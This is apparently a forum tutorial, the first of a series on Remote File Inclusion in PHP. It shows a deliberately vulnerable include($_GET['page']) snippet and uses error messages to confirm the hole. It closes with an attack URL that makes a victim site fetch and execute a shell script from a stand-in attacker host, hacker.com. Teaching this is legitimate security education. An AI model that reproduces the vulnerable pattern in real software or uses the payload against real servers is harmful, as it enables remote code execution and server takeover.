Beggining of RFI

Assalam-0-Alaikum,

Completing my RFI Series:

1. Beginning of RFI
2. Finding And Exploiting RFI vulnerabilities
3. Securing RFI vulnerabilities

Lets begin,

786

So, In The Last Overview of RFI I said that file inclusion is including files in another file. Well, that is all right but what does that actually mean?

lets say we got 2 files.

index.php
content.php

The index.php is the file people is going to view when they visit my page. www.site.com as usual. But we want index.php to display the contents of content.php without the user actually visiting content.php.

All you would need to do is put this PHP script in the index.php:

Code: (php)

PHP Code:

Now we are showing the contents of content.php when the user visits index.php. If content.php was to include more PHP code it would also get executed.

That is it. We just did file inclusion! However, this example is just a dummy page and would most likely not be found in real life.


Lets create a new scenario. A more realistic scenario. We got the following files/pages:

index.php
1.php
2.php
3.php

Now, index.php is again the file the users are going to visit. On the default index we are going to display 3 links.

www.site.com/index.php?page=1
www.site.com/index.php?page=2
www.site.com/index.php?page=3

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php.

The index.php script site would in this case look something like this(note that I am now coding like an idiot to create security holes):

Code: (php)

PHP Coding:

if (isset($_GET['page']))
{
include($_GET['page'] . “.php”);
}
else
{
echo('
page1
');
echo('page2
');
echo('page3
');
}

 
The content of 1,2 and 3 is not important in this example so I wont say anything about that.Now, when a user clicks the page1 link he or she is taken to www.site.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL + “.php” the same goes for 2 and 3.


Now, what is this “Remote” part in RFI all about? Well, this belongs more in the “exploting RFI vulnerabilities” part of this tutorial but I have to say something short about it now.

The above code is vulnerable to RFI. You can test this by visiting:
www.site.com/index.php?page=4

That would give us an error(assuming the server administrator have not turned off “show errors” in the PHP configuration). The error would look something like this:

Warning: include(page4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening 'page4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3

This would tell us that the include() function used in this script is not secured and can be exploited. The way you exploit it is by getting it to include your code so that you can control the server. This is where the “remote” part of RFI comes in. You can create a PHP script and save it as .txt, upload it to a server and then visit something like this:

http://www.site.com/index.php?page=http://hacker.com/shell.txt?

Note that the ? is to get rid of the “.php” at the end as we did not name the file .txt.php and also if you where to try to include a .php file from a remote server it will only give the executed output of the PHP file.

Now we have successfully put out code in the PHP engine of the victim server and we are free to do whatever you can do with PHP. Which is mostly anything.  

I think it is enough For Today Next About finding of RFI vulnerabilities soon.